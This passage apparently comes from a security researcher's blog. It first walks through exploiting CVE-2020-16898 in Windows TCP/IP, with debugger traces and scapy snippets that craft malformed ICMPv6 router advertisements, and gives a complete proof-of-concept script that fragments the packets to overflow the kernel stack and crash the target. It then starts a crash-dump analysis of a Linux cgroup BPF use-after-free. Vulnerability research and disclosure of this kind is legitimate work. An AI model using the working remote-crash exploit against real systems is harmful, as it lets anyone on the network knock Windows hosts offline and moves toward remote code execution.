06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0

It works! OK, let’s move on to the phase of triggering the bug.

Triggering the bug

What we know from the detection logic write-up:

“we check to see if the Length (second byte in the Option) is an even number”

Let’s test it:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

and we end up executing this code:

fffff804`4852a5b3 4c8b15be8b0700  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`4852a5ba e8113bceff      call    fffff804`4820e0d0
fffff804`4852a5bf 418bd7          mov     edx,r15d
fffff804`4852a5c2 498bce          mov     rcx,r14
fffff804`4852a5c5 488bd8          mov     rbx,rax
fffff804`4852a5c8 e8a39de5ff      call    tcpip!NetioAdvanceNetBuffer (fffff804`48384370)
fffff804`4852a5cd 0fb64301        movzx   eax,byte ptr [rbx+1]
fffff804`4852a5d1 8d4e01          lea     ecx,[rsi+1]
fffff804`4852a5d4 2bc6            sub     eax,esi
fffff804`4852a5d6 4183cfff        or      r15d,0FFFFFFFFh
fffff804`4852a5da 99              cdq
fffff804`4852a5db f7f9            idiv    eax,ecx
fffff804`4852a5dd 8b5304          mov     edx,dword ptr [rbx+4]
fffff804`4852a5e0 8945b7          mov     dword ptr [rbp-49h],eax
fffff804`4852a5e3 8bf0            mov     esi,eax
fffff804`4852a5e5 413bd7          cmp     edx,r15d
fffff804`4852a5e8 7412            je      tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc)

Essentially, it subtracts 1 from the Length field and the result is divided by 2. This follows the documentation logic and can be summarized as:

tmp = (Length - 1) / 2

This logic generates the same result for an even number and the preceding odd number:

(8 – 1) / 2 => 3
(7 – 1) / 2 => 3

There is nothing wrong with that by itself. However, this also “defines” how long the option is. Since IPv6 addresses are 16 bytes long, by providing an even number the last 8 bytes of the payload will be treated as the beginning of the next option header. We can see that in Wireshark as well:

[Wireshark screenshot: the crafted packet, with the trailing 8 bytes of the RDNSS option dissected as the start of the next option]
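To make the byte accounting concrete, here is a small illustration (not code from the exploit) of the option walker’s “Length * 8” jump quoted earlier from the detection write-up: with an even Length, 8 trailing bytes of the RDNSS option are left over and become the start of the “next” option:

# We actually send an RDNSS option of 8 header bytes + 3 * 16-byte addresses
# = 56 bytes, while declaring its Length in units of 8 octets.
option_bytes = 8 + 3 * 16       # 56 bytes on the wire

for length_field in (7, 6):
    advance = length_field * 8  # the option walker jumps Length * 8 bytes ahead
    leftover = option_bytes - advance
    print(f"Length={length_field}: walker advances {advance} bytes, "
          f"{leftover} trailing bytes become the 'next' option")
# Length=7: walker advances 56 bytes, 0 trailing bytes become the 'next' option
# Length=6: walker advances 48 bytes, 8 trailing bytes become the 'next' option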

That’s pretty interesting. However, what do we do with it? What next header should we fake? Why does this matter at all? Well… it took me some time to figure this out. To be honest, I wrote a simple fuzzer to find out 🙂

Hunting for the correct header(s) (Problem 2)

If we look in the documentation at the available headers / options, we don’t really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml):

What we do know is that ICMPv6 messages have the following general format:

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |     Type      |     Code      |          Checksum             |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      +                         Message Body                          +
      |                                                               |

The first byte encodes the “type”. I made a test and generated the fake next header to be exactly the same as the “buggy” RDNSS one. I kept hitting the breakpoint on tcpip!Ipv6pUpdateRDNSS, while tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I fired up IDA Pro and started to analyze what was going on and what logic was being executed. After some reverse engineering I realized that there are 2 loops in the code:

  1. The first loop goes through all the option headers and does some basic validation (sizes, lengths, etc.)
  2. The second loop doesn’t do any more validation; it just parses the packet.

As long as there are more “optional headers” in the buffer, we stay in the loop. That’s a very good primitive! Anyway, I still didn’t know which headers should be used, so to find out I brute-forced all the “optional header” types through the triggered bug (a rough sketch of this follows the list below) and found out that the second loop only cares about:

  • Type 3 (Prefix Information)
  • Type 24 (Route Information)
  • Type 25 (RDNSS)
  • Type 31 (DNS Search List Option)
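The following is only an illustration of that brute-force idea (not my original fuzzer, and on its own it does not yet satisfy the size checks described in the next problems): with an even RDNSS Length, the smuggled option’s Type byte ends up at offset 8 of the last DNS address, so we can simply iterate over all 256 values there:

#!/usr/bin/env python3
# Illustration only: iterate over the Type byte of the smuggled option.
# With an even RDNSS Length, the last 8 bytes of the final address are
# re-parsed as the next option, so its Type byte sits at offset 8 of that address.
from scapy.all import IPv6, ICMPv6ND_RA, ICMPv6NDOptRDNSS, send

v6_dst = "<destination address>"        # placeholders, as in the snippets above
v6_src = "<link-local source address>"

for t in range(256):
    c = ICMPv6NDOptRDNSS()
    c.len = 6                           # even Length -> smuggle a fake option
    c.dns = [
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
        "AAAA:AAAA:AAAA:AAAA:%02xAA:AAAA:AAAA:AAAA" % t,  # fake Type byte
    ]
    send(IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c, verbose=False)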

I analyzed the Type 24 logic, since it was much “smaller / shorter” than Type 3.

Stack overflow

OK. Let’s try to generate the malicious RDNSS packet, “faking” Route Information as the next option:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

This never hits the tcpip!Ipv6pUpdateRDNSS function.

Problem 3 – size of the packet.

After some debugging I realized that we fail the following check:

fffff804`483ba766 418b4618        mov     eax,dword ptr [r14+18h]
fffff804`483ba76a 413bc7          cmp     eax,r15d
fffff804`483ba76d 0f85d0810b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943)

where eax is the size of the packet and r15 holds the amount of data consumed so far. In this specific case we have:

rax = 0x48
r15 = 0x40

This is exactly an 8-byte difference, because we use an even Length. To bypass it, I placed another header just after the last one. However, I was still hitting the same problem 🙁 It took me some time to figure out how to play with the packet layout to bypass it, but I finally managed to do so.

Problem 4 – size again!

Finally, I found the correct packet layout and should have ended up in the code responsible for handling the Route Information header. However, I did not 🙂 Here is why. After returning from the RDNSS handler I ended up here:

fffff804`48472cba e875780b00      call    tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534)
fffff804`48472cbf 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472cc5 e9c980f4ff      jmp     tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93)
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
fffff804`483bad21 0fb64801        movzx   ecx,byte ptr [rax+1]
fffff804`483bad25 66c1e103        shl     cx,3
fffff804`483bad29 66894c2462      mov     word ptr [rsp+62h],cx
fffff804`483bad2e 6685c9          test    cx,cx
fffff804`483bad31 0f8485060000    je      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)
fffff804`483bad37 0fb7c9          movzx   ecx,cx
fffff804`483bad3a 413b4e18        cmp     ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8
fffff804`483bad3e 0f8778060000    ja      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)

ecx holds the “Length” of the “fake header”. However, [r14+18h] holds the size of the data left in the packet. I set the Length to the max (0xFF), which is multiplied by 8 (2040 == 0x7f8). However, there are only 0xb8 bytes left. So I failed another size validation!

To fix it, I decreased the size of the “fake header” and at the same time attached more data to the packet. That worked!

Problem 5 – NdisGetDataBuffer() and fragmentation

I had finally found all the puzzle pieces needed to trigger the bug. Or so I thought… I ended up executing the following code, responsible for handling the Route Information message:

fffff804`48472cd9 33c0            xor     eax,eax
fffff804`48472cdb 44897c2420      mov     dword ptr [rsp+20h],r15d
fffff804`48472ce0 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472ce6 4c8d85b8010000  lea     r8,[rbp+1B8h]
fffff804`48472ced 418bd7          mov     edx,r15d
fffff804`48472cf0 488985b8010000  mov     qword ptr [rbp+1B8h],rax
fffff804`48472cf7 448bcf          mov     r9d,edi
fffff804`48472cfa 488985c0010000  mov     qword ptr [rbp+1C0h],rax
fffff804`48472d01 498bce          mov     rcx,r14
fffff804`48472d04 488985c8010000  mov     qword ptr [rbp+1C8h],rax
fffff804`48472d0b 48898580010000  mov     qword ptr [rbp+180h],rax
fffff804`48472d12 48898588010000  mov     qword ptr [rbp+188h],rax
fffff804`48472d19 4c8b1558041300  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0

It tries to get “Length” bytes from the packet to read the entire header. However, the Length is fake and not validated; in my test case it has the value 0x100. The destination address points to a buffer on the stack representing the Route Information header, which is a very small buffer. So we should have a classic stack overflow, but inside the NdisGetDataBuffer function I ended up executing this:

fffff804`4820e10c 8b7910          mov     edi,dword ptr [rcx+10h]
fffff804`4820e10f 8b4328          mov     eax,dword ptr [rbx+28h]
fffff804`4820e112 8bf2            mov     esi,edx
fffff804`4820e114 488d0c3e        lea     rcx,[rsi+rdi]
fffff804`4820e118 483bc8          cmp     rcx,rax
fffff804`4820e11b 773e            ja      fffff804`4820e15b
fffff804`4820e11d f6430a05        test    byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c
fffff804`4820e121 0f84813f0400    je      fffff804`482520a8
fffff804`4820e127 488b4318        mov     rax,qword ptr [rbx+18h]
fffff804`4820e12b 4885c0          test    rax,rax
fffff804`4820e12e 742b            je      fffff804`4820e15b
fffff804`4820e130 8b4c2470        mov     ecx,dword ptr [rsp+70h]
fffff804`4820e134 8d55ff          lea     edx,[rbp-1]
fffff804`4820e137 4803c7          add     rax,rdi
fffff804`4820e13a 4823d0          and     rdx,rax
fffff804`4820e13d 483bd1          cmp     rdx,rcx
fffff804`4820e140 7519            jne     fffff804`4820e15b
fffff804`4820e142 488b5c2450      mov     rbx,qword ptr [rsp+50h]
fffff804`4820e147 488b6c2458      mov     rbp,qword ptr [rsp+58h]
fffff804`4820e14c 488b742460      mov     rsi,qword ptr [rsp+60h]
fffff804`4820e151 4883c430        add     rsp,30h
fffff804`4820e155 415f            pop     r15
fffff804`4820e157 415e            pop     r14
fffff804`4820e159 5f              pop     rdi
fffff804`4820e15a c3              ret
fffff804`4820e15b 4d85f6          test    r14,r14

In the first “cmp” instruction, the rcx register holds the requested size. The rax register holds some huge number, and because of that the comparison never sent me down the other path. As a result of that call, I kept getting back an address other than the local stack address, and no overflow happened. I didn’t know what was going on… So I started to read the documentation of this function, and here is the magic:

“If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows:
If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter.
If the Storage parameter is NULL, the return value is NULL.”

Here we go… Our big packet is kept somewhere in NDIS as contiguous data, and a pointer to that data is returned instead of copying it to the local buffer on the stack. I started to Google whether anyone had already hit that problem and… of course, yes 🙂 Looking at this link:

http://newsoft-tech.blogspot.com/2010/02/

we can learn that the simplest solution is to fragment the packet. This is exactly what I did and…

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`45bca210 cc              int     3
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus
01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12
02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947
03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107
04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69
05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0
06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323
07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5
08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef
09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
...

Here we go! 🙂

Proof-of-Concept

Code can be found here:

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

Thanks,
Adam

CVE: 2020-14356 & 2020-25220

The short story of 1 Linux Kernel Use-After-Free bug and 2 CVEs (CVE-2020-14356 and CVE-2020-25220)

Name:     Linux kernel Cgroup BPF Use-After-Free
Author:   Adam Zabrocki ([email protected])
Date:       May 27, 2020

First things first – short history:

In 2019, Tejun Heo discovered a race problem with the lifetime of cgroup_bpf which could result in a double-free and other memory corruption. This bug was fixed in kernel 5.3. More information about the problem and the patch can be found here:

https://lore.kernel.org/patchwork/patch/1094080/

Roman Gushchin discovered another problem with the newly fixed code which could lead to a use-after-free vulnerability. His report and fix can be found here:

https://lore.kernel.org/bpf/[email protected]/

During the discussion on the fix, Alexei Starovoitov pointed out that walking through the cgroup hierarchy without holding cgroup_mutex might be dangerous:

https://lore.kernel.org/bpf/20200104003523.rfte5rw6hbnncjes@ast-mbp/

However, Roman and Alexei concluded that it shouldn’t be a problem:

https://lore.kernel.org/bpf/20200106220746.fm3hp3zynaiaqgly@ast-mbp/

Unfortunately, there is another Use-After-Free bug related to the Cgroup BPF release logic.

The “new” bug – details (a lot of details ;-)):

During LKRG development and testing, one of my VMs was generating a kernel crash during the shutdown procedure. This specific machine had the newest kernel at that time (5.7.x), which I compiled with full debug information as well as the SLAB DEBUG feature. When I analyzed the crash, it had nothing to do with LKRG. Later I confirmed that kernels without LKRG hit the same issue:

      KERNEL: linux-5.7/vmlinux
    DUMPFILE: /var/crash/202006161848/dump.202006161848  [PARTIAL DUMP]
        CPUS: 1
        DATE: Tue Jun 16 18:47:40 2020
      UPTIME: 14:09:24
LOAD AVERAGE: 0.21, 0.37, 0.50
       TASKS: 234
    NODENAME: oi3
     RELEASE: 5.7.0-g4
     VERSION: #28 SMP PREEMPT Fri Jun 12 18:09:14 UTC 2020
     MACHINE: x86_64  (3694 Mhz)
      MEMORY: 8 GB
       PANIC: "Oops: 0000 [#1] PREEMPT SMP PTI" (check log for details)
         PID: 1060499
     COMMAND: "sshd"
        TASK: ffff9d8c36b33040  [THREAD_INFO: ffff9d8c36b33040]
         CPU: 0
       STATE:  (PANIC)

crash> bt
PID: 1060499  TASK: ffff9d8c36b33040  CPU: 0   COMMAND: "sshd"
 #0 [ffffb0fc41b1f990] machine_kexec at ffffffff9404d22f
 #1 [ffffb0fc41b1f9d8] __crash_kexec at ffffffff941c19b8
 #2 [ffffb0fc41b1faa0] crash_kexec at ffffffff941c2b60
 #3 [ffffb0fc41b1fab0] oops_end at ffffffff94019d3e
 #4 [ffffb0fc41b1fad0] page_fault at ffffffff95c0104f
    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9423e801  RSP: ffffb0fc41b1fb88  RFLAGS: 00010246
    RAX: 0000000000000000  RBX: ffff9d8d56ae1ee0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9d8e25c40b00  RDI: ffffffff9423e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001
    ORIG_RAX: ffffffffffffffff  CS: 0010  SS: 0018
 #5 [ffffb0fc41b1fbd0] ip_finish_output at ffffffff957d71b3
 #6 [ffffb0fc41b1fbf8] __ip_queue_xmit at ffffffff957d84e1
 #7 [ffffb0fc41b1fc50] __tcp_transmit_skb at ffffffff957f4b27
 #8 [ffffb0fc41b1fd58] tcp_write_xmit at ffffffff957f6579
 #9 [ffffb0fc41b1fdb8] __tcp_push_pending_frames at ffffffff957f737d
#10 [ffffb0fc41b1fdd0] tcp_close at ffffffff957e6ec1
#11 [ffffb0fc41b1fdf8] inet_release at ffffffff9581809f
#12 [ffffb0fc41b1fe10] __sock_release at ffffffff95616848
#13 [ffffb0fc41b1fe30] sock_close at ffffffff956168bc
#14 [ffffb0fc41b1fe38] __fput at ffffffff942fd3cd
#15 [ffffb0fc41b1fe78] task_work_run at ffffffff94148a4a
#16 [ffffb0fc41b1fe98] do_exit at ffffffff9412b144
#17 [ffffb0fc41b1ff08] do_group_exit at ffffffff9412b8ae
#18 [ffffb0fc41b1ff30] __x64_sys_exit_group at ffffffff9412b92f
#19 [ffffb0fc41b1ff38] do_syscall_64 at ffffffff940028d7
#20 [ffffb0fc41b1ff50] entry_SYSCALL_64_after_hwframe at ffffffff95c0007c
    RIP: 00007fe54ea30136  RSP: 00007fff33413468  RFLAGS: 00000202
    RAX: ffffffffffffffda  RBX: 00007fff334134e0  RCX: 00007fe54ea30136
    RDX: 00000000000000ff  RSI: 000000000000003c  RDI: 00000000000000ff
    RBP: 00000000000000ff   R8: 00000000000000e7   R9: fffffffffffffdf0
    R10: 000055a091a22d09  R11: 0000000000000202  R12: 000055a091d67f20
    R13: 00007fe54ea5afa0  R14: 000055a091d7ef70  R15: 000055a091d70a20
    ORIG_RAX: 00000000000000e7  CS: 0033  SS: 002b

PID 1060499 is an sshd child:

...
root        5462  0.0  0.0  12168  7276 ?        Ss   04:38   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
...
root     1060499  0.0  0.1  13936  9056 ?        Ss   17:51   0:00  \_ sshd: pi3 [priv]
pi3      1062463  0.0  0.0  13936  5852 ?        S    17:51   0:00      \_ sshd: pi3@pts/3
...

The crash happens in the function “__cgroup_bpf_run_filter_skb”, exactly in this piece of code:

0xffffffff9423e7ee <__cgroup_bpf_run_filter_skb+382>: callq  0xffffffff94153cb0 <preempt_count_add>
0xffffffff9423e7f3 <__cgroup_bpf_run_filter_skb+387>: callq  0xffffffff941925a0 <__rcu_read_lock>
0xffffffff9423e7f8 <__cgroup_bpf_run_filter_skb+392>: mov 0x3e8(%rbp),%rax
0xffffffff9423e7ff <__cgroup_bpf_run_filter_skb+399>: xor %ebp,%ebp
0xffffffff9423e801 <__cgroup_bpf_run_filter_skb+401>: mov 0x10(%rax),%rdi
                                                          ^^^^^^^^^^^^^^^
0xffffffff9423e805 <__cgroup_bpf_run_filter_skb+405>: lea 0x10(%rax),%r14
0xffffffff9423e809 <__cgroup_bpf_run_filter_skb+409>: test %rdi,%rdi

where RAX is 0000000000000000. However, when I was playing with the repro under SLAB_DEBUG, I often got RAX: 6b6b6b6b6b6b6b6b (the slab poison pattern):

    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9123e801  RSP: ffffb136c16ffb88  RFLAGS: 00010246
    RAX: 6b6b6b6b6b6b6b6b  RBX: ffff9ce3e5a0e0e0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9ce3de26b280  RDI: ffffffff9123e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001

So we have some kind of Use-After-Free bug, and it is triggerable from user mode. I looked at the binary in IDA:

.text:FFFFFFFF8123E7EE skb = rbx      ; sk_buff * ; PIC mode
.text:FFFFFFFF8123E7EE type = r15     ; bpf_attach_type
.text:FFFFFFFF8123E7EE save_sk = rsi  ; sock *
.text:FFFFFFFF8123E7EE        call    near ptr preempt_count_add-0EAB43h
.text:FFFFFFFF8123E7F3        call    near ptr __rcu_read_lock-0AC258h ; PIC mode
.text:FFFFFFFF8123E7F8        mov     ret, [rbp+3E8h]
.text:FFFFFFFF8123E7FF        xor     ebp, ebp
.text:FFFFFFFF8123E801 _cn = rbp      ; u32
.text:FFFFFFFF8123E801        mov     rdi, [ret+10h]  ; prog
.text:FFFFFFFF8123E805        lea     r14, [ret+10h]

and this code is referencing cgroups from the socket. Source code:

int __cgroup_bpf_run_filter_skb(struct sock *sk,
				struct sk_buff *skb,
				enum bpf_attach_type type)
{
    ...
	struct cgroup *cgrp;
    ...
	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);
	...
	if (type == BPF_CGROUP_INET_EGRESS) {
		ret = BPF_PROG_CGROUP_INET_EGRESS_RUN_ARRAY(
			cgrp->bpf.effective[type], skb,
			__bpf_prog_run_save_cb);
		...
	}
	...
}

Debugger:

crash> x/4i 0xffffffff9423e7f8
   0xffffffff9423e7f8:  mov    0x3e8(%rbp),%rax
   0xffffffff9423e7ff:  xor    %ebp,%ebp
   0xffffffff9423e801:  mov    0x10(%rax),%rdi
   0xffffffff9423e805:  lea    0x10(%rax),%r14
crash> p/x (int)&((struct cgroup*)0)->bpf
$2 = 0x3e0
crash> ptype struct cgroup_bpf
type = struct cgroup_bpf {
    struct bpf_prog_array *effective[28];
    struct list_head progs[28];
    u32 flags[28];
    struct bpf_prog_array *inactive;
    struct percpu_ref refcnt;
    struct work_struct release_work;
}
crash> print/a sizeof(struct bpf_prog_array)
$3 = 0x10
crash> print/a ((struct sk_buff *)0xffff9ce3e5a0e0e0)->sk
$4 = 0xffff9ce3de26b280
crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

We also know that R15: 0000000000000001 == type == BPF_CGROUP_INET_EGRESS

crash> p/a ((struct cgroup *)0xffff9ce3e2416800)->bpf.effective[1]
$6 = 0x6b6b6b6b6b6b6b6b
crash> x/20a 0xffff9ce3e2416800
0xffff9ce3e2416800:     0x6b6b6b6b6b6b016b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416810:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416820:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416830:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416840:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416850:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416860:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416870:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416880:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416890:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
crash>

This pointer (struct cgroup *)

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

points to a freed object. However, the kernel still keeps eBPF rules attached to the socket under cgroups. When the process (sshd) dies (the do_exit() call) and cleanup is executed, all of its sockets are closed. If such a socket has “pending” packets, the following code path is executed:

do_exit -> ... -> sock_close -> __sock_release -> inet_release -> tcp_close -> __tcp_push_pending_frames -> tcp_write_xmit -> __tcp_transmit_skb -> __ip_queue_xmit -> ip_finish_output -> __cgroup_bpf_run_filter_skb

However, there is nothing wrong with this logic and path by itself. The real problem is that the cgroup disappeared while it still had active clients. How is that even possible? Just before the crash I can see the following entry in the kernel logs:

[190820.457422] ------------[ cut here ]------------
[190820.457465] percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[190820.457511] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457511] Modules linked in: [last unloaded: p_lkrg]
[190820.457513] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Tainted: G           OE     5.7.0-g4 #28
[190820.457513] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[190820.457515] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x112/0x120
